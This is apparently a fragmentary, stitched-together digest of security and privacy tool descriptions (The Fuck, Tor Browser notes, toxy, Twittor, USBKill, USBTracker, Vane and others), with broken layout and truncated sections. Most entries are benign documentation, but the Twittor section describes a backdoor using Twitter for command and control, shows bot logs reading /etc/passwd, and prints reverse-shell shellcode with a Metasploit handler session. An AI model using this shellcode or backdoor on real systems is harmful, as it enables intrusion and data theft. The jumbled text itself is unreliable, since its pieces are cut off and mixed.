{INSTALL_LOCATION}"
For AFTER_COMMANDS that do self install (don't need user
interaction) - place an exit after your commands so it exits the
shell.
Few examples:
apt-get install vim
E: Could not open lock file /var/lib/dpkg/lock - open
(13: Permission denied)
E: Unable to lock the administration directory (/var/lib/
dpkg/), are you root?
fuck
sudo apt-get install vim [enter///ctrl+c]
[sudo] password for nvbn:
Reading package lists... Done
...
git push
fatal: The current branch master has no upstream branch.
To push the current branch and set the remote as
upstream, use
git push --set-upstream origin master
fuck
git push --set-upstream origin master [enter///ctrl+c]
Counting objects: 9, done.
...
puthon
No command 'puthon' found, did you mean:
Command 'python' from package 'python-minimal' (main)
Command 'python' from package 'python3' (main)
zsh: command not found: puthon
fuck
python [enter///ctrl+c]
Python 3.4.2 (default, Oct
8 2014, 13:08:17)
...
git brnch
git: 'brnch' is not a git command. See 'git --help'.
Did you mean this?
branch
fuck
git branch [enter///ctrl+c]
* master
lein rpl
'rpl' is not a task. See 'lein help'.
Did you mean this?
repl
fuck
lein repl [enter///ctrl+c]
nREPL server started on port 54848 on host 127.0.0.1 nrepl://127.0.0.1:54848
REPL-y 0.3.1
...
Requirements
Installation [ experimental ]
Manual installation
Install The Fuck with pip :
sudo pip install thefuck
name;
directory;
cpp11 adds missing -std=c++11 to g++ or clang++ ;
dirty_untar fixes tar x command that untarred in the
current directory;
dirty_unzip fixes unzip command that unzipped in
the current directory;
django_south_ghost adds --delete-ghostmigrations to failed because ghosts django south
migration;
django_south_merge adds --merge to inconsistent
django south migration;
docker_not_command fixes wrong docker commands
like docker tags ;
dry fixes repetitions like git git push ;
fix_alt_space replaces Alt+Space with Space
character;
fix_file opens a file with an error in your $EDITOR ;
git_add fixes "Did you forget to 'git add'?" ;
git_branch_delete changes git branch -d to git
branch -D ;
git_branch_list catches git branch list in place of
git branch and removes created branch;
git_checkout fixes branch name or creates new
branch;
git_diff_staged adds --staged to previous git diff
with unexpected output;
git_fix_stash fixes git stash commands
(misspelled subcommand and missing save );
git_not_command fixes wrong git commands like git
brnch ;
git_pull sets upstream before executing previous git
pull ;
git_pull_clone clones instead of pulling when the
For adding your own rule you should create your-rulename.py in ~/.thefuck/rules . The rule should contain two
functions:
match(command: Command) -> bool
get_new_command(command: Command) -> str | list[str]
def get_new_command(command):
return 'sudo {}'.format(command.script)
# Optional:
enabled_by_default = True
def side_effect(command, fixed_command):
subprocess.call('chmod 777 .', shell=True)
priority = 1000
requires_output = True
Developing
Install The Fuck for development:
pip install -r requirements.txt
python setup.py develop
Download Thefuck
TIGER - THE UNIX SECURITY AUDIT AND INTRUSION
DETECTION TOOL
Download Tiger
TOR BROWSER 4.5 - EVERYTHING YOU NEED TO SAFELY
BROWSE THE INTERNET
Security Improvements
The 4.5 series also features a rewrite of the obfs2, obfs3, and
ScrambleSuit transports in GoLang, as well as the introduction
of the new obfs4 transport. The obfs4 transport provides
additional DPI and probing resistance features which prevent
automated scanning for Tor bridges. As long as they are not
discovered via other mechanisms, fresh obfs4 bridge
addresses will work in China today. Additionally, barring new
attacks, private obfs4 addresses should continue to work
indefinitely.
Privacy Improvements
Here is the complete list of changes in the 4.5 series since 4.0:
All Platforms
Update Tor to 0.2.6.7 with additional patches:
Bug 15482: Reset timestamp_dirty each time a
SOCKSAuth circuit is used
Update NoScript to 2.6.9.22
Update HTTPS-Everywhere to 5.0.3
Bug 15689: Resume building HTTPSEverywhere from git tags
Update meek to 0.17
Include obfs4proxy 0.0.5
Use obfs4proxy for obfs2, obfs3, obfs4, and
ScrambleSuit bridges
Pluggable Transport Dependency Updates:
Bug 15265: Switch go.net repo to golang.org/x/
net
Bug 15448: Use golang 1.4.2 for meek and
obs4proxy
Update Tor Launcher to 0.2.7.4. Changes since
0.2.7.0.2 in 4.0.8:
Bug 11879: Stop bootstrap if Cancel or Open
Settings is clicked
Bug 13271: Display Bridge Configuration wizard
pane before Proxy pane
Bug 13576: Don't strip "bridge" from the middle
of bridge lines
Bug 13983: Directory search path fix for Tor
Messanger+TorBirdy
Bug
14122:
Hide
logo
if
TOR_HIDE_BROWSER_LOGO set
Bug 14336: Fix navigation button display issues
on some wizard panes
Bug 15657: Display the host:port of any
connection faiures in bootstrap
Bug 15704: Do not enable network if wizard is
opened
Update Torbutton to 1.9.2.2. Changes since 1.7.0.2
in 4.0.8:
Bug 3455: Use SOCKS user+pass to isolate all
requests from the same url domain
Bug 5698: Use "Tor Browser" branding in
"About Tor Browser" dialog
Bug 7255: Warn users about maximizing
windows
Bug 8400: Prompt for restart if disk records are
enabled/disabled.
Bug 8641: Create browser UI to indicate current
tab's Tor circuit IPs
(Many Circuit UI issues were fixed during
4.5; see release changelogs for those).
plugin initialization.
Bug 11175: Remove "About Torbutton" from
onion menu.
Bug 11236: Don't set omnibox order in
Torbutton (to prevent translation)
Bug 11449: Fix new identity error if NoScript is
not enabled
Bug 13019: Change locale spoofing pref to
boolean
Bug 13079: Option to skip control port
verification
Bug 13406: Stop directing users to downloadeasy.html.en on update
Bug 13650: Clip initial window height to 1000px
Bugs 13751+13900: Remove SafeCache cache
isolation code in favor of C++ patch
Bug 13766: Set a 10 minute circuit lifespan for
non-content requests
Bug 13835: Option to change default Tor
Browser homepage
Bug 13998: Handle changes in NoScript
2.6.9.8+
Bug 14100: Option to hide NetworkSettings
menuitem
Bug 14392: Don't steal input focus in about:tor
search box
Bug 14429: Provide automatic window resizing,
but disable for now
Bug 14448: Restore Torbutton menu operation
on non-English localizations
Bug 14490: Use Disconnect search in about:tor
search box
Bug 14630: Hide Torbutton's proxy settings tab.
Bug 14631: Improve profile access error msgs
(strings for translation).
Bugs 14632+15334: Display Cookie Protections
All Platforms
Update Tor to 0.2.6.7 with additional patches:
Bug 15482: Reset timestamp_dirty each time a
SOCKSAuth circuit is used
Update NoScript to 2.6.9.22
Update HTTPS-Everywhere to 5.0.3
Bug 15689: Resume building HTTPSEverywhere from git tags
Update meek to 0.17
Update obfs4proxy to 0.0.5
Update Tor Launcher to 0.2.7.4
Bug 15704: Do not enable network if wizard is
opened
Bug 11879: Stop bootstrap if Cancel or Open
Settings is clicked
Bug 13576: Don't strip "bridge" from the middle
of bridge lines
WHAT IT ISN'T...
Tor Messenger builds on the networks you are familiar with, so
that you can continue communicating in a way your contacts
are willing and able to do. This has traditionally been in a clientserver model, meaning that your metadata (specifically the
relationships between contacts) can be logged by the server.
However, your route to the server will be hidden because you
are communicating over Tor.
We are also excited about systems like Pond and Ricochet,
which try to solve this problem, and would encourage you to
look at their designs and use them too.
WHY INSTANTBIRD?
We considered a number of messaging clients: Pidgin, Adam
Langley's xmpp-client, and Instantbird. Instantbird was the
pragmatic choice -- its transport protocols are written in a
memory-safe language (JavaScript); it has a graphical user
interface and already supports many natural languages; and it's
a XUL application, which means we can leverage both the code
(Tor Launcher) and in-house expertise that the Tor Project has
developed working on Tor Browser with Firefox. It also has an
active and vibrant software developer community that has been
very responsive and understanding of our needs. The main
feature it lacked was OTR support, which we have
implemented and hope to upstream to the main Instantbird
repository for the benefit of all Instantbird (and Thunderbird)
users.
INSTRUCTIONS
DownloadTor Messenger:
Linux (32-bit)
Linux (64-bit)
Windows
OS X (Mac)
scopes)
Easily augmentable via middleware (based on connect/
express middleware)
Supports both incoming and outgoing traffic poisoning
Built-in poisons (bandwidth, error, abort, latency, slow
read...)
Rule-based poisoning (probabilistic, HTTP method,
headers, body...)
Supports third-party poisons and rules
Built-in balancer and traffic interceptor via middleware
Inherits API and features from rocky
Compatible with connect/express (and most of their
middleware)
Able to run as standalone HTTP proxy
Introduction
Why toxy?
There're some other similar solutions like toxy in the market,
but most of them do not provide a proper programmatic control
and usually are not easy to hack, configure or are directly
closed to extensibility.
Furthermore, the majority of the those solutions only operates
at TCP L3 level stack instead of providing high-level
abstractions to cover common requirements in the specific
domain and nature of the HTTP L7 protocol, like toxy tries to
provide
toxy brings a powerful hackable and extensible solution with a
convenient abstraction, but without losing a proper low-level
interface capabilities to deal with HTTP protocol primitives
easily.
toxy was designed based on the rules of composition, simplicity
and extensibility. Via its built-in hierarchical domain specific
middleware layer you can easily augment toxy features to your
own needs.
Concepts
toxy introduces two directives: poisons and rules.
Poisons are the specific logic which infects an incoming or
outgoing HTTP transaction (e.g: injecting a latency, replying
with an error). One HTTP transaction can be poisoned by one
or multiple poisons, and those poisons can be also configured
to infect both global or route level traffic.
Rules are a kind of match validation filters that inspects an
HTTP request/response in order to determine, given a certain
rules, if the HTTP transaction should be poisioned or not (e.g: if
headers matches, query params, method, body...). Rules can
be reused and applied to both incoming and outgoing traffic
flows, including different scopes: global, route or poison level.
How it works
( Incoming request )
|||
+-------------+
| Toxy Router |
+-------------+
|||
+--------------------+
|
Incoming phase
----------------
Exec Rules
---------------|||
|
|
----------------
| Exec Poisons |
----------------
+~~~~~~~~~~~~~~~~~~~~+
+--------------------+
|
HTTP dispatcher
+--------------------+
|
Outgoing phase
target server
|~~~~~~~~~~~~~~~~~~~~|
|
----------------
Exec Rules
----------------
|||
|
|
----------------
| Exec Poisons |
----------------
+~~~~~~~~~~~~~~~~~~~~+
|||
Usage
Installation
Examples
See examples directory for more use cases.
var toxy = require('toxy')
var poisons = toxy.poisons
var rules = toxy.rules
// Create a new toxy proxy
var proxy = toxy()
// Default server to forward incoming traffic
proxy
.forward('http://httpbin.org')
// Register global poisons and rules
proxy
.poison(poisons.latency({ jitter: 500 }))
.rule(rules.probability(25))
// Register multiple routes
proxy
.get('/download/*')
.forward('http://files.myserver.net')
.poison(poisons.bandwidth({ bps: 1024 }))
.withRule(rules.headers({'Authorization': /^Bearer (.*)
$/i }))
// Infect outgoing traffic only (after the server replied
properly)
proxy
.get('/image/*')
.outgoingPoison(poisons.bandwidth({ bps: 512 }))
.withRule(rules.method('GET'))
.withRule(rules.timeThreshold({ duration: 1000,
threshold: 1000 * 10 }))
.withRule(rules.responseStatus({ range: [ 200,
400 ] }))
proxy
.all('/api/*')
.poison(poisons.rateLimit({ limit: 10, threshold:
1000 }))
.withRule(rules.method(['POST', 'PUT', 'DELETE']))
// And use a different more permissive poison for GET
requests
.poison(poisons.rateLimit({ limit: 50, threshold:
1000 }))
.withRule(rules.method('GET'))
// Handle the rest of the traffic
proxy
.all('/*')
.poison(poisons.slowClose({ delay: 1000 }))
.poison(poisons.slowRead({ bps: 128 }))
.withRule(rules.probability(50))
proxy.listen(3000)
console.log('Server listening on port:', 3000)
console.log('Test it:', 'http://localhost:3000/image/
jpeg')
Poisons
latency
Poisoning Phase
incoming / outgoing
true
Inject response
Name
inject
Poisoning Phase
incoming / outgoing
toxy.poison(toxy.poisons.inject({
code: 503,
body: '{"error": "toxy injected error"}',
headers: {'Content-Type': 'application/json'}
}))
Bandwidth
Name
bandwidth
Poisoning Phase
incoming / outgoing
true
Rate limit
Name
rateLimit
Poisoning Phase
incoming / outgoing
true
Slow read
Name
rateLimit
Poisoning Phase
incoming
true
Slow open
Name: slowOpen
Name
slowOpen
Poisoning Phase
incoming
true
Slow close
Name
slowClose
Poisoning Phase
incoming / outgoing
true
Throttle
Name
throttle
Poisoning Phase
incoming / outgoing
true
Abort connection
Name
abort
Poisoning Phase
incoming / outgoing
Timeout
Name
timout
Poisoning Phase
incoming / outgoing
true
Arguments :
miliseconds number - Timeout limit in miliseconds
toxy.poison(toxy.poisons.timeout(5000))
You can optionally extend the build-in poisons with your own
poisons:
toxy.addPoison(customLatency)
// Then you can use it as a built-in poison
proxy
.get('/foo')
.poison(toxy.poisons.customLatency)
Name
probability
Poison Phase
incoming / outgoing
Time threshold
Name
timeThreshold
Poison Phase
incoming / outgoing
Method
Name
method
Poison Phase
incoming / outgoing
Content Type
Filters by content type header. It should be present
Arguments :
value string|regexp - Header value to match.
var rule = toxy.rules.contentType('application/json')
toxy.rule(rule)
Headers
Name
headers
Poison Phase
incoming / outgoing
}
var rule = toxy.rules.headers(matchHeaders)
toxy.rule(rule)
Response headers
Name
responseHeaders
Poison Phase
outgoing
Body
Name
body
Poison Phase
incoming / outgoing
Response body
Name
responseBody
Poison Phase
outgoing
Response status
Name
responseStatus
Poison Phase
outgoing
Third-party rules
List of available third-party rules provided by the community.
PR are welcome.
IP - Enable/disable poisons based on the client IP address
(supports CIDR, subnets, ranges...).
How to write rules
Rules are simple middleware functions that resolve
asyncronously with a boolean value to determine if a given
HTTP transaction should be ignored when poisoning.
Your rule must resolve with a boolean param calling the
next(err, shouldIgnore) function in the middleware,
passing a true value if the rule has not matches and should
not apply the poisoning, and therefore continuing with the next
middleware stack.
Here's an example of a simple rule matching the HTTP method
to determine if:
var toxy = require('toxy')
function customMethodRule(matchMethod) {
/**
* We name the function since it's used by toxy to
identify the rule to get/disable/remove it in the future
*/
return function customMethodRule(req, res, next) {
var shouldIgnore = req.method !== matchMethod
next(null, shouldIgnore)
}
}
You can optionally extend the build-in rules with your own rules:
toxy.addRule(customMethodRule)
// Then you can use it as a built-in poison
proxy
.get('/foo')
.rules(toxy.rules.customMethodRule)
.poison(toxy.poisons.latency(1000))
.withRule(toxy.rules.contentType('json'))
.forward('http://foo.server')
toxy
.post('/bar')
.poison(toxy.poisons.bandwidth({ bps: 1024 }))
.withRule(toxy.rules.probability(50))
.forward('http://bar.server')
toxy
.post('/boo')
.outgoingPoison(toxy.poisons.bandwidth({ bps: 1024 }))
.withRule(toxy.rules.method('GET'))
.forward('http://boo.server')
toxy.all('/*')
toxy.listen(3000)
toxy#get(path, [ middleware... ])
Return: ToxyRoute
Register a new route for GET method.
toxy#post(path, [ middleware... ])
Return: ToxyRoute
Register a new route for POST method.
toxy#put(path, [ middleware... ])
Return: ToxyRoute
Register a new route for PUT method.
toxy#patch(path, [ middleware... ])
Return: ToxyRoute
toxy#delete(path, [ middleware... ])
Return: ToxyRoute
Register a new route for DELETE method.
toxy#head(path, [ middleware... ])
Return: ToxyRoute
Register a new route for HEAD method.
toxy#all(path, [ middleware... ])
Return: ToxyRoute
Register a new route for any method.
toxy#poisons => Object
Exposes a map with the built-in poisons. Prototype alias to
toxy.poisons
toxy#forward(url)
Define a URL to forward the incoming traffic received by the
proxy.
toxy#balance(urls)
Forward to multiple servers balancing among them.
For more information, see the rocky docs
toxy#replay(url)
Define a new replay server. You can call this method multiple
times to define multiple replay servers.
For more information, see the rocky docs
toxy#use(middleware)
toxy#getPoison(name)
Return: Directive|null
Searchs and retrieves a registered poison in the stack by name
identifier.
toxy#getIncomingPoison(name)
Return: Directive|null
Searchs and retrieves a registered incoming poison in the
stack by name identifier.
toxy#getOutgoingPoison(name)
Return: Directive|null
Searchs and retrieves a registered outgoing poison in the
stack by name identifier.
toxy#getPoisons()
Return: array<Directive>
Return an array of registered poisons.
toxy#getIncomingPoisons()
Return: array<Directive>
Return an array of registered incoming poisons.
toxy#getOutgoingPoisons()
Return: array<Directive>
Return an array of registered outgoing poisons.
toxy#flush()
Alias: flushPoisons
Remove all the registered poisons.
toxy#enableRule(rule)
Enable a rule by name identifier.
toxy#disableRule(rule)
Disable a rule by name identifier.
toxy#removeRule(rule)
Return: boolean
Remove a rule by name identifier.
toxy#disableRules()
Disable all the registered rules.
toxy#isRuleEnabled(rule)
Return: boolean
Checks if the given rule is enabled by name identifier.
toxy#getRule(rule)
Return: Directive|null
Searchs and retrieves a registered rule in the stack by name
identifier.
toxy#getRules()
Return: array<Directive>
Returns and array with the registered rules wrapped as
Directive .
toxy#flushRules()
Remove all the rules.
toxy.addPoison(name, fn)
Extend built-in poisons.
toxy.addRule(name, fn)
Extend built-in rules.
toxy.poisons => Object
Exposes a map with the built-in poisons.
toxy.rules => Object
Exposes a map with the built-in rules.
Directive(middlewareFn)
A convenient wrapper internally used for poisons and rules.
Normally you don't need to know this interface, but for hacking
purposes or more low-level actions might be useful.
Directive#enable()
Return: boolean
Directive#disable()
Return: boolean
Directive#isEnabled()
Return: boolean
Directive#rule(rule)
Alias: filter
Directive#handler()
Return: function(req, res, next)
HTTP API
The toxy HTTP API follows the JSON API conventions,
API
Hierarchy :
Servers - Managed toxy instances
Rules - Globally applied rules
Poisons - Globally applied poisons
Rules - Poison-specific rules
Routes - List of configured routes
Route - Object for each specific route
Rules - Route-level registered rules
Poisons - Route-level registered poisons
Rules - Route-level poison-specific
rules
GET /
Servers
GET /servers
GET /servers/:id
Rules
GET /servers/:id/rules
POST /servers/:id/rules
Accepts: application/json
Example payload:
{
"name": "method",
"options": "GET"
}
DELETE /servers/:id/rules
GET /servers/:id/rules/:id
DELETE /servers/:id/rules/:id
Poisons
GET /servers/:id/poison
POST /servers/:id/poisons
Accepts: application/json
Example payload:
{
"name": "latency",
"phase": "outgoing",
"options": { "jitter": 1000 }
}
DELETE /servers/:id/poisons
GET /servers/:id/poisons/:id
DELETE /servers/:id/poisons/:id
GET /servers/:id/poisons/:id/rules
POST /servers/:id/poisons/:id/rules
Accepts: application/json
Example payload:
{
"name": "method",
"options": "GET"
}
DELETE /servers/:id/poisons/:id/rules
GET /servers/:id/poisons/:id/rules/:id
DELETE /servers/:id/poisons/:id/rules/:id
Routes
GET /servers/:id/routes
POST /servers/:id/routes
Accepts: application/json
Example payload:
{
"path": "/foo", // Required
"method": "GET", // use ALL for all the methods
"forward": "http://my.server", // Optional custom
forward server URL
}
DELETE /servers/:id/routes
GET /servers/:id/routes/:id
DELETE /servers/:id/routes/:id
Route rules
GET /servers/:id/routes/:id/rules
POST /servers/:id/routes/:id/rules
Accepts: application/json
Example payload:
{
"name": "method",
"options": "GET"
}
DELETE /servers/:id/routes/:id/rules
GET /servers/:id/routes/:id/rules/:id
DELETE /servers/:id/routes/:id/rules/:id
Route poisons
GET /servers/:id/routes/:id/poisons
POST /servers/:id/routes/:id/poisons
Accepts: application/json
Example payload:
{
"name": "latency",
"phase": "outgoing",
"options": { "jitter": 1000 }
}
DELETE /servers/:id/routes/:id/poisons
GET /servers/:id/routes/:id/poisons/:id
DELETE /servers/:id/routes/:id/poisons/:id
GET /servers/:id/routes/:id/poisons/:id/rules
POST /servers/:id/routes/:id/poisons/:id/rules
Accepts: application/json
Example payload:
{
"name": "method",
"options": "GET"
}
DELETE /servers/:id/routes/:id/poisons/:id/rules
GET /servers/:id/routes/:id/poisons/:id/rules/:id
DELETE /servers/:id/routes/:id/poisons/:id/rules/:id
Programmatic API
The built-in HTTP admin server also provides a simple interface
open to extensibility and hacking purposes. For instance, you
can plug in additional middleware to the admin server, or
register new routes.
toxy.admin([ opts ])
Returns: Admin
Supported options :
apiKey string - Optional API key to protect the server
port number - Optional. TCP port to listen
cors boolean - Enable CORS for web browser access
middleware array<function> - Plug in additional
middleware
ssl object - Node.js HTTPS server TLS options .
Admin#listen([ port, host ])
Start listening on the network.
Admin#manage(toxy)
Manage a toxy server instance.
Admin#find(toxy)
Find a toxy instance. Accepts toxy server ID or toxy instance.
Admin#remove(toxy)
Stop managing a toxy instance.
Admin#use(...middleware)
Register a middleware.
Admin#param(...middleware)
Register a param middleware.
Admin#get(path, [ ...middleware ])
Register a GET route.
Admin#post(path, [ ...middleware ])
Register a POST route.
Admin#put(path, [ ...middleware ])
Register a PUT route.
Admin#delete(path, [ ...middleware ])
Register a DELETE route.
Admin#patch(path, [ ...middleware ])
Register a PATCH route.
Admin#all(path, [ ...middleware ])
Register a route accepting any HTTP method.
Admin#middleware(req, res, next)
Middleware to plug in with connect/express.
Admin#close(cb)
Stop the server.
Download Toxy
TRIBLER - DOWNLOAD TORRENTS USING TOR-INSPIRED
ONION ROUTING
DownloadTribler
TWITTOR - A FULLY FEATURED BACKDOOR THAT USES
TWITTER AS A C&C SERVER
ACCESS_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_TOKEN_SECRET =
'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
USERNAME = 'XXXXXXXXXXXXXXXXXXXXXXXX'
command:
$ list_bots
B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-withUbuntu-14.04-precise
$
This will send a PING request and wait 10 seconds for them to
answer. Direct messages will then be parsed - Bot list will be
refreshed but also the command list, including new command
outputs.
Retrieve previous commands
As I said earlier, (previous) commands will be retrieved from
older direct messages (limit is 200) and you can actually
retrieve/see them by using thelist_commands command
$ list_commands
8WNzapM: 'uname -a ' on 2C:4C:84:8C:D3:B1
VBQpojP: 'cat /etc/passwd' on 2C:4C:84:8C:D3:B1
9KaVJf6: 'PING' on 2C:4C:84:8C:D3:B1
aCu8jG9: 'ls -al' on 2C:4C:84:8C:D3:B1
8LRtdvh: 'PING' on 2C:4C:84:8C:D3:B1
$
(...)
Payload size: 299 bytes
buf =
""
buf += "\xfc
\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f
\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c
\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a
\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b
\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b
\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d
\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b
\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b
\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff
\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d
\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff
\xd5\xb8"
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b
\x00"
buf += "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea
\x0f"
buf += "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a
\x00\x00\x01\x68"
buf += "\x02\x00\x0e\x1f\x89\xe6\x6a
\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e
\x08\x75\xec"
buf += "\xe8\x3f\x00\x00\x00\x6a\x00\x6a
\x04\x56\x57\x68\x02"
buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b
\x36\x6a"
buf += "\x40\x68\x00\x10\x00\x00\x56\x6a
\x00\x68\x58\xa4\x53"
buf += "\xe5\xff\xd5\x93\x53\x6a
\x00\x56\x53\x57\x68\x02\xd9"
buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7e
\xc3\x01\xc3\x29\xc6"
buf += "\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff
\xd5"
Et voil!
msf exploit(handler) > exploit
[*] Started reverse handler on 10.0.0.1:3615
[*] Starting the payload handler...
[*] Sending stage (884270 bytes) to 10.0.0.99
Download Twittor
USBDEVIEW V2.45 - VIEW ALL INSTALLED/CONNECTED
USB DEVICES ON YOUR SYSTEM
DownloadUSBDeview v2.45
USBKILL - ANTI-FORENSIC KILL-SWITCH THAT WAITS
FOR A CHANGE ON YOUR USB PORTS
Why?
(version 1.0-rc.2)
Compatible with Linux, *BSD and OS X.
Shutdown the computer when there is USB activity.
Customizable. Define which commands should be
executed just before shut down.
Ability to whitelist a USB device.
Ability to change the check interval (default: 250ms).
Ability to melt the program on shut down.
Works with sleep mode (OS X).
No dependency except srm. sudo apt-get install
secure-delete
Sensible defaults
DownloadUSBkill
USBTRACKER - SCRIPT TO TRACK USB DEVICES
EVENTS AND ARTIFACTS IN A WINDOWS OS
Usage
Help
-u, --usbstor
registry
-uu, --usbstor-verbose
Dump USB detailed artifacts from
USBSTOR registry.
-nh, --no-hardwareid
USBSTOR detailed
artifacts registry dump.
-df, --driver-frameworks
Dump USB artifacts and events
from the Windows
DriverFrameworks Usermode log.
-x, --raw-xml-event
Other&Ven_WD&Prod_SES_Device&Rev_1012
u'GenDisk']
CompatibleIDs : [u'USBSTOR\\Disk', u'USBSTOR\
\RAW']
ContainerID : {a3ce89cb-5363-54a8-8d4faf2374c200a5}
ConfigFlags : 0
ClassGUID : {4d36e967-e325-11cebfc1-08002be10318}
Driver : {4d36e967-e325-11cebfc1-08002be10318}\0004
Class : DiskDrive
Mfg : @disk.inf,%genmanufacturer%;(Standard disk
drives)
Service : disk
FriendlyName : Generic STORAGE DEVICE USB Device
=========================================================
=============
...
To dump the same events in XML format, just add the "-x" flag :
PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -df -x
USBTracker alpha
2015 - Sysinsider
USBTracker it's a free tool which allow you to extract
some USB artifacts from a Windows OS (Vista and later).
You must execute USBTracker inside a CMD/Powershell
console runnnig with administror privileges to be able to
dump some
log files artifacts.
USB related event(s) found in the event log :
=============================================
<Event xmlns="http://schemas.microsoft.com/win/2004/08/
events/event"><System><Provider Name="Microsoft-WindowsDriverFra
meworks-UserMode" Guid="2e35aaeb-857f-4beba418-2e6c0e54d988"></Provider>
<EventID Qualifiers="">1003</EventID>
<Version>1</Version>
<Level>4</Level>
<Task>17</Task>
<Opcode>1</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2015-01-18 20:31:34.013599"></
TimeCreated>
<EventRecordID>2</EventRecordID>
<Correlation ActivityID="" RelatedActivityID=""></
Correlation>
<Execution ProcessID="836" ThreadID="1488"></Execution>
<Channel>Microsoft-Windows-DriverFrameworks-UserMode/
Operational</Channel>
<Computer>37L4247F27-25</Computer>
<Security UserID="S-1-5-18"></Security>
</System>
<UserData><UMDFDriverManagerHostCreateStart
lifetime="8c076f4d-6405-4414-a829-ee44a94e3893"
xmlns:auto-ns2="http://schem
as.microsoft.com/win/2004/08/events" xmlns="http://
www.microsoft.com/DriverFrameworks/UserMode/
Event"><HostGuid>{193a182
0-d9ac-4997-8c55-be817523f6aa}</HostGuid>
<DeviceInstanceId>WPDBUSENUMROOT.UMB.2&37C186B&
0&STORAGE#VOLUME#_??
_USBSTOR#DISK&VEN_KINGSTON&PROD_D
ATATRAVELER_2.0&REV_1.00#0019B931D970C8C0C5DB00B9&
;0#</DeviceInstanceId>
</UMDFDriverManagerHostCreateStart>
</UserData>
</Event>
...
usb\vid_0930&pid_6544\0019b931d970c8c0c5db00b9]
>>>
>>>
storage\volume\_??
_usbstor#disk&ven_kingston&prod_datatraveler_2.0&rev_1.00
#0019b931d970c8c0c5db00b9&0#{53f56307b6bf-11d0-94f2-00a0c91efb8b}]
>>>
>>>
WpdBusEnumRoot\UMB\2&37c186b&0&STORAGE#VOLUME#_??
_USBSTOR#DISK&VEN_KINGSTON&PROD_DATATRAVELER_2.0&REV_1.00
#0019B931D970C8C0C5DB00B9&0#]
>>>
>>>
usb\root_hub20\4&56dcbd&0]
>>>
>>>
usb\root_hub\4&38d808bf&0]
>>>
>>>
usb\root_hub\4&fee3d1d&0]
>>>
>>>
usb\root_hub20\4&3a831ac0&0]
>>>
>>>
usb\vid_0458&pid_0137\5&1d8fb94c&0&3]
>>>
>>>
usb\vid_05ac&pid_8242\5&1d8fb94c&0&5]
>>>
>>>
usb\vid_05ac&pid_8502\8t9a9e8d577k3l00]
>>>
...
Download USBTracker
USERPROFILESVIEW - VIEW USER PROFILES
INFORMATION ON YOUR WINDOWS
Version 1.10
Added 'Run As Administrator' option (Ctrl+F11)
Added 'Registry Loaded' column (Yes/No), which
specifies whether the Registry key of the user is
loaded into HKEY_USERS key.
Added 'Logon Time' column, which specifies the
logon time of the current logged on user.
UserProfilesView now displays the system users that
System Requirements
/stext
<Filena
me>
/stab
<Filena
me>
/
scomm
a
<Filena
me>
/
stabula
r
<Filena
me>
/shtml
<Filena
me>
/
sverht
ml
<Filena
me>
/sxml
<Filena
me>
/sort
<colum
n>
/nosort
DownloadUserProfilesView
VANE - WORDPRESS VULNERABILITY SCANNER (A GPL
FORK OF WPSCAN)
Prerequisites
Windows not supported
Ruby => 1.9
RubyGems
Git
Installing on Debian/Ubuntu
sudo apt-get install libcurl4-gnutls-dev libopenssl-ruby
libxml2 libxml2-dev libxslt1-dev ruby-dev
git clone https://github.com/delvelabs/vane.git
cd vane
sudo gem install bundler && bundle install --without test
development
Installing on Fedora
sudo yum install libcurl-devel
git clone https://github.com/delvelabs/vane.git
cd vane
sudo gem install bundler && bundle install --without test
development
Installing on Archlinux
pacman -Sy ruby
pacman -Sy libyaml
git clone https://github.com/delvelabs/vane.git
cd vane
sudo gem install bundler && bundle install --without test
development
gem install typhoeus
gem install nokogiri
Installing on Mac OS X
git clone https://github.com/delvelabs/vane.git
cd vane
sudo gem install bundler && bundle install --without test
development
KNOWN ISSUES
VANE ARGUMENTS
--update Update to the latest revision
--url | -u The WordPress URL/domain to scan.
--force | -f Forces WPScan to not check if the remote site is
running WordPress.
--enumerate | -e [option(s)] Enumeration. option : u usernames
from id 1 to 10 u[10-20] usernames from id 10 to 20 (you must
write [] chars) p plugins vp only vulnerable plugins ap all plugins
(can take a long time) tt timthumbs t themes vp only vulnerable
themes at all themes (can take a long time) Multiple values are
allowed : '-e tt,p' will enumerate timthumbs and plugins If no
option is supplied, the default is 'vt,tt,u,vp'
--exclude-content-based '' Used with the enumeration option,
will exclude all occurrences based on the regexp or string
supplied You do not need to provide the regexp delimiters, but
you must write the quotes (simple or double)
--config-file | -c Use the specified config file
--follow-redirection If the target url has a redirection, it will be
followed without asking if you wanted to do so or not
--wp-content-dir WPScan try to find the content directory (ie wpcontent) by scanning the index page, however you can
specified it. Subdirectories are allowed
